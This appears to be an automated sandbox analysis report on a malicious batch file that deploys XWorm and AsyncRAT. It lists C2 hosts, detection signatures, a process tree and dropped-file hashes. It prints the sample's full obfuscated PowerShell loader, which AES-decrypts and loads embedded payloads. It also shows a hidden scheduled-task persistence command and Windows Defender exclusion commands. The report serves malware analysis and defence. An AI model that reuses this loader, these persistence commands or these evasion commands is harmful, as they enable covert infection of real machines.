Analysis
max time kernel: 86s
max time network: 93s
platform: windows10-2004_x64
resource: win10v2004-20240704-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
submitted: 04-07-2024 20:01
Static task: static1
General
Target: wininit.bat
Size: 292KB
MD5: cf1da3f20349f15bfacf7c271d60684c
SHA1: ad4a58069d800ca900c5752929aa92d5d87fe3c7
SHA256: ee6dc82f435a2224bcc30034bb5c5827d4470078f5238bf2f6e5a5023528d24f
SHA512: 8743be3187c9a080cc8fb6ec7243ff98f3d157c4e884503045bc56b0d042ef9a81a127c92a8f80d00b899f3e92c11f9877bd3bdf6c7eeb863d1bb503830cdccd
SSDEEP: 6144:OFJjDy7sYeIK8ODi9szVwhTvSPOk07BuYfZ2YIOXi/COBNFfIsqJW:OFZSsV88ERrSP+7EQ20QFwJW
Malware Config

Extracted
Family: xworm
C2:
  super-nearest.gl.at.ply.gg:17835
  best-bird.gl.at.ply.gg:27196
  wiz.bounceme.net:6000
install_file: USB.exe

Extracted
Family: asyncrat
Default
C2: finally-grande.gl.at.ply.gg:25844
delay: 1
install: false
install_folder: %AppData%
Signatures

Detect Xworm Payload (5 IoCs)
Processes:
  resource  yara_rule
  behavioral1/memory/3828-16-0x000001FA58060000-0x000001FA580A8000-memory.dmp  family_xworm
  behavioral1/memory/1128-53-0x00000170606C0000-0x00000170606DA000-memory.dmp  family_xworm
  C:\Users\Admin\AppData\Local\Temp\mshta.exe  family_xworm
  behavioral1/memory/4572-75-0x0000000000C60000-0x0000000000C78000-memory.dmp  family_xworm
  behavioral1/memory/4572-120-0x000000001CAB0000-0x000000001CABE000-memory.dmp  family_xworm
Async RAT payload (2 IoCs)
Processes:
  resource  yara_rule
  behavioral1/memory/3828-16-0x000001FA58060000-0x000001FA580A8000-memory.dmp  family_asyncrat
  C:\Users\Admin\AppData\Local\Temp\scvhost.exe  family_asyncrat
Blocklisted process makes network request (2 IoCs)
Processes:
  flow  pid   process
  13    1128  powershell.exe
  19    1128  powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTPs, 7 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
  pid   process
  3488  powershell.exe
  5024  powershell.exe
  2860  powershell.exe
  1328  powershell.exe
  3828  powershell.exe
  3868  powershell.exe
  1128  powershell.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
  description        ioc                                                                                             process
  Key value queried  \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation  WScript.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation  mshta.exe
Executes dropped EXE (2 IoCs)
Processes:
  pid   process
  3356  scvhost.exe
  4572  mshta.exe
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  11    ip-api.com
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes:
  description      ioc                                                                                                                                                    process
  Set value (str)  \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp"  powershell.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  description        ioc                                                                  process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                    msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
Modifies registry class (1 IoCs)
Processes:
  description  ioc                                                                                process
  Key created  \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings  powershell.exe
Suspicious behavior: EnumeratesProcesses (22 IoCs)
Processes:
  pid   process
  3828  powershell.exe
  3828  powershell.exe
  3868  powershell.exe
  3868  powershell.exe
  1128  powershell.exe
  1128  powershell.exe
  2860  powershell.exe
  2860  powershell.exe
  1328  powershell.exe
  1328  powershell.exe
  4572  mshta.exe
  3488  powershell.exe
  3488  powershell.exe
  5024  powershell.exe
  5024  powershell.exe
  1128  powershell.exe
  4220  msedge.exe
  4220  msedge.exe
  924   msedge.exe
  924   msedge.exe
  3748  identity_helper.exe
  3748  identity_helper.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)
Processes:
  pid   process
  924   msedge.exe  (6 identical entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
  description                          pid   process
  Token: SeDebugPrivilege              3828  powershell.exe
  Token: SeDebugPrivilege              3868  powershell.exe
  Token: SeIncreaseQuotaPrivilege      3868  powershell.exe
  Token: SeSecurityPrivilege           3868  powershell.exe
  Token: SeTakeOwnershipPrivilege      3868  powershell.exe
  Token: SeLoadDriverPrivilege         3868  powershell.exe
  Token: SeSystemProfilePrivilege      3868  powershell.exe
  Token: SeSystemtimePrivilege         3868  powershell.exe
  Token: SeProfSingleProcessPrivilege  3868  powershell.exe
  Token: SeIncBasePriorityPrivilege    3868  powershell.exe
  Token: SeCreatePagefilePrivilege     3868  powershell.exe
  Token: SeBackupPrivilege             3868  powershell.exe
  Token: SeRestorePrivilege            3868  powershell.exe
  Token: SeShutdownPrivilege           3868  powershell.exe
  Token: SeDebugPrivilege              3868  powershell.exe
  Token: SeSystemEnvironmentPrivilege  3868  powershell.exe
  Token: SeRemoteShutdownPrivilege     3868  powershell.exe
  Token: SeUndockPrivilege             3868  powershell.exe
  Token: SeManageVolumePrivilege       3868  powershell.exe
  Token: 33                            3868  powershell.exe
  Token: 34                            3868  powershell.exe
  Token: 35                            3868  powershell.exe
  Token: 36                            3868  powershell.exe
  Token: SeIncreaseQuotaPrivilege      3868  powershell.exe
  Token: SeSecurityPrivilege           3868  powershell.exe
  Token: SeTakeOwnershipPrivilege      3868  powershell.exe
  Token: SeLoadDriverPrivilege         3868  powershell.exe
  Token: SeSystemProfilePrivilege      3868  powershell.exe
  Token: SeSystemtimePrivilege         3868  powershell.exe
  Token: SeProfSingleProcessPrivilege  3868  powershell.exe
  Token: SeIncBasePriorityPrivilege    3868  powershell.exe
  Token: SeCreatePagefilePrivilege     3868  powershell.exe
  Token: SeBackupPrivilege             3868  powershell.exe
  Token: SeRestorePrivilege            3868  powershell.exe
  Token: SeShutdownPrivilege           3868  powershell.exe
  Token: SeDebugPrivilege              3868  powershell.exe
  Token: SeSystemEnvironmentPrivilege  3868  powershell.exe
  Token: SeRemoteShutdownPrivilege     3868  powershell.exe
  Token: SeUndockPrivilege             3868  powershell.exe
  Token: SeManageVolumePrivilege       3868  powershell.exe
  Token: 33                            3868  powershell.exe
  Token: 34                            3868  powershell.exe
  Token: 35                            3868  powershell.exe
  Token: 36                            3868  powershell.exe
  Token: SeIncreaseQuotaPrivilege      3868  powershell.exe
  Token: SeSecurityPrivilege           3868  powershell.exe
  Token: SeTakeOwnershipPrivilege      3868  powershell.exe
  Token: SeLoadDriverPrivilege         3868  powershell.exe
  Token: SeSystemProfilePrivilege      3868  powershell.exe
  Token: SeSystemtimePrivilege         3868  powershell.exe
  Token: SeProfSingleProcessPrivilege  3868  powershell.exe
  Token: SeIncBasePriorityPrivilege    3868  powershell.exe
  Token: SeCreatePagefilePrivilege     3868  powershell.exe
  Token: SeBackupPrivilege             3868  powershell.exe
  Token: SeRestorePrivilege            3868  powershell.exe
  Token: SeShutdownPrivilege           3868  powershell.exe
  Token: SeDebugPrivilege              3868  powershell.exe
  Token: SeSystemEnvironmentPrivilege  3868  powershell.exe
  Token: SeRemoteShutdownPrivilege     3868  powershell.exe
  Token: SeUndockPrivilege             3868  powershell.exe
  Token: SeManageVolumePrivilege       3868  powershell.exe
  Token: 33                            3868  powershell.exe
  Token: 34                            3868  powershell.exe
  Token: 35                            3868  powershell.exe
Suspicious use of FindShellTrayWindow (25 IoCs)
Processes:
  pid   process
  924   msedge.exe  (25 identical entries)
Suspicious use of SendNotifyMessage (24 IoCs)
Processes:
  pid   process
  924   msedge.exe  (24 identical entries)
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
  pid   process
  4572  mshta.exe
  1128  powershell.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
  description                       pid   process         target process
  PID 3416 wrote to memory of 1140  3416  cmd.exe         cmd.exe
  PID 3416 wrote to memory of 1140  3416  cmd.exe         cmd.exe
  PID 3416 wrote to memory of 3828  3416  cmd.exe         powershell.exe
  PID 3416 wrote to memory of 3828  3416  cmd.exe         powershell.exe
  PID 3828 wrote to memory of 3868  3828  powershell.exe  powershell.exe
  PID 3828 wrote to memory of 3868  3828  powershell.exe  powershell.exe
  PID 3828 wrote to memory of 5064  3828  powershell.exe  WScript.exe
  PID 3828 wrote to memory of 5064  3828  powershell.exe  WScript.exe
  PID 5064 wrote to memory of 2812  5064  WScript.exe     cmd.exe
  PID 5064 wrote to memory of 2812  5064  WScript.exe     cmd.exe
  PID 2812 wrote to memory of 2436  2812  cmd.exe         cmd.exe
  PID 2812 wrote to memory of 2436  2812  cmd.exe         cmd.exe
  PID 2812 wrote to memory of 1128  2812  cmd.exe         powershell.exe
  PID 2812 wrote to memory of 1128  2812  cmd.exe         powershell.exe
  PID 1128 wrote to memory of 3356  1128  powershell.exe  scvhost.exe
  PID 1128 wrote to memory of 3356  1128  powershell.exe  scvhost.exe
  PID 1128 wrote to memory of 4572  1128  powershell.exe  mshta.exe
  PID 1128 wrote to memory of 4572  1128  powershell.exe  mshta.exe
  PID 4572 wrote to memory of 2860  4572  mshta.exe       powershell.exe
  PID 4572 wrote to memory of 2860  4572  mshta.exe       powershell.exe
  PID 4572 wrote to memory of 1328  4572  mshta.exe       powershell.exe
  PID 4572 wrote to memory of 1328  4572  mshta.exe       powershell.exe
  PID 1128 wrote to memory of 3488  1128  powershell.exe  powershell.exe
  PID 1128 wrote to memory of 3488  1128  powershell.exe  powershell.exe
  PID 1128 wrote to memory of 5024  1128  powershell.exe  powershell.exe
  PID 1128 wrote to memory of 5024  1128  powershell.exe  powershell.exe
  PID 1128 wrote to memory of 924   1128  powershell.exe  msedge.exe
  PID 1128 wrote to memory of 924   1128  powershell.exe  msedge.exe
  PID 924 wrote to memory of 628    924   msedge.exe      msedge.exe
  PID 924 wrote to memory of 628    924   msedge.exe      msedge.exe
  PID 924 wrote to memory of 3428   924   msedge.exe      msedge.exe  (34 identical entries)
Processes

C:\Windows\system32\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wininit.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7JNVAI/bOCfTrc9Cyv1KrVXb/edm5Def39ZXQyWYIiY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cjJ5rTvtiS42ynBUE3pozA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Ludab=New-Object System.IO.MemoryStream(,$param_var); $svcPY=New-Object System.IO.MemoryStream; $oCbKk=New-Object System.IO.Compression.GZipStream($Ludab, [IO.Compression.CompressionMode]::Decompress); $oCbKk.CopyTo($svcPY); $oCbKk.Dispose(); $Ludab.Dispose(); $svcPY.Dispose(); $svcPY.ToArray();}function execute_function($param_var,$param2_var){ $WLpRi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $urgeW=$WLpRi.EntryPoint; $urgeW.Invoke($null, $param2_var);}$JiVki = 'C:\Users\Admin\AppData\Local\Temp\wininit.bat';$host.UI.RawUI.WindowTitle = $JiVki;$BrRJc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JiVki).Split([Environment]::NewLine);foreach ($Ioscd in $BrRJc) { if ($Ioscd.StartsWith('gAlOrZETIRGuyGxGQovI')) { $LUETq=$Ioscd.Substring(20); break; }}$payloads_var=[string[]]$LUETq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_79_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_79.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WScript.exe
      command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_79.vbs"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_79.bat" "
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\cmd.exe
          command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7JNVAI/bOCfTrc9Cyv1KrVXb/edm5Def39ZXQyWYIiY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cjJ5rTvtiS42ynBUE3pozA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Ludab=New-Object System.IO.MemoryStream(,$param_var); $svcPY=New-Object System.IO.MemoryStream; $oCbKk=New-Object System.IO.Compression.GZipStream($Ludab, [IO.Compression.CompressionMode]::Decompress); $oCbKk.CopyTo($svcPY); $oCbKk.Dispose(); $Ludab.Dispose(); $svcPY.Dispose(); $svcPY.ToArray();}function execute_function($param_var,$param2_var){ $WLpRi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $urgeW=$WLpRi.EntryPoint; $urgeW.Invoke($null, $param2_var);}$JiVki = 'C:\Users\Admin\AppData\Roaming\Windows_Log_79.bat';$host.UI.RawUI.WindowTitle = $JiVki;$BrRJc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JiVki).Split([Environment]::NewLine);foreach ($Ioscd in $BrRJc) { if ($Ioscd.StartsWith('gAlOrZETIRGuyGxGQovI')) { $LUETq=$Ioscd.Substring(20); break; }}$payloads_var=[string[]]$LUETq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Sets desktop wallpaper using registry
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory

          C:\Users\Admin\AppData\Local\Temp\scvhost.exe
            command line: "C:\Users\Admin\AppData\Local\Temp\scvhost.exe"
            - Executes dropped EXE

          C:\Users\Admin\AppData\Local\Temp\mshta.exe
            command line: "C:\Users\Admin\AppData\Local\Temp\mshta.exe"
            - Checks computer location settings
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory

            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mshta.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses

            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses

          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
            - Enumerates system info in registry
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
            - Suspicious use of WriteProcessMemory

            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcac3146f8,0x7ffcac314708,0x7ffcac314718

            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 /prefetch:3
              - Suspicious behavior: EnumeratesProcesses

            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8

            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1

            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

            C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:8

            C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:8
              - Suspicious behavior: EnumeratesProcesses

            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1

            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1

            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,13262586741950406355,11417510642957169374,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe
  command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe
  command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\rundll32.exe
  command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: 09c7ae658385f6de986103443217840b
  SHA1: 298d880503edce4413337c09d3525f27a2edcd28
  SHA256: 91e04ec38abdb0204458543592c4621b7bc0306407884f764aa9596a52454cd7
  SHA512: 4e1272b209487d1e9e7d8502be49ebce91c76718410e817b3ac7faf47d9b699210aab1b941fbb5ddafc192ddf4b2ba151afd47fab753ec62bc0bca36039c55c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: 3c78617ec8f88da19254f9ff03312175
  SHA1: 344e9fed9434d924d1c9f05351259cbc21e434d3
  SHA256: 3cb47fcdca33bb3c8f4acc98424140987235ad79815da4f0e7593e4591ae90ed
  SHA512: 5b58675088b0fc2b2d705cb648ea89385b80c7cf908b0f4f95a9acdbd350b50754e1b586202db6a918eef70029fafb210947f3c43c570ecf7657e08939fd7e9c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: 41a7f109bd69c83731c6bc9a8183b6ef
  SHA1: 8df7b03f98718d791fae0fd41ce0b38f09886afd
  SHA256: 5afe320f7c930d44c01e519cd611b39b8af99dd2459d7e985c99d7a4ae5fc2d8
  SHA512: 7b7d187170c21b759aead85510f1fa36cdac95587ef1640bfab3588459706e11a09e711f86650f2d4ae6e4d0c84affdb906924ddd470a0875161fa2c16048404

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: 839ce5ae0ef78a63eed3baca576fd8c4
  SHA1: cb2ab6a63cfb45caa559476bbaf585fcd54d2dc0
  SHA256: 985d54a9ec3d0207a5438ae79bd0e245b113019c0e74572d174d5c2a03a6ab47
  SHA512: 5b71d394878d19652525d5f465528c9f263feafa4714f7f2f72edbae6e17211bb046373fbe87726bcdcd1bd50d28994de6b30d3ab797f5b4af815dbc19619290

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
  Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: b260491e0ba425d42eae0a6f7e5be166
  SHA1: 1c2821e3ccbb3445ef89a2213f38bdd0d49e49ae
  SHA256: b8244b449976461ddb6ee680590c89051418b638602b1203d064404fa9aefbc9
  SHA512: 70e7c67eeae156db4d11660f6c3372713cf2bb83e188b5464311d429625273d449fe155f061c1538824131b500e1d65fa6acf6e56b765ea862bc73af0fb1e451

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: 8c76712e8d3413a409d53d4fce9a2ef4
  SHA1: e4600f2e1a7e163214bb5b99928573afb64ce3f5
  SHA256: 98b8516d6f5fd26c3f0e15bd41515a3e7cf8988c79d6b8a3b68c61e06473a5fd
  SHA512: 0dac8e86394533a10352b7d6d81cd4485f6346cc84b74044ac7ef7862b283d1108ac69410e2d1ca5d8eddbc6d89b153de28a7f53cb101a6bd70d351efad99a9b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 2KB
  MD5: 005bc2ef5a9d890fb2297be6a36f01c2
  SHA1: 0c52adee1316c54b0bfdc510c0963196e7ebb430
  SHA256: 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
  SHA512: f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: e5663972c1caaba7088048911c758bf3
  SHA1: 3462dea0f9c2c16a9c3afdaef8bbb1f753c1c198
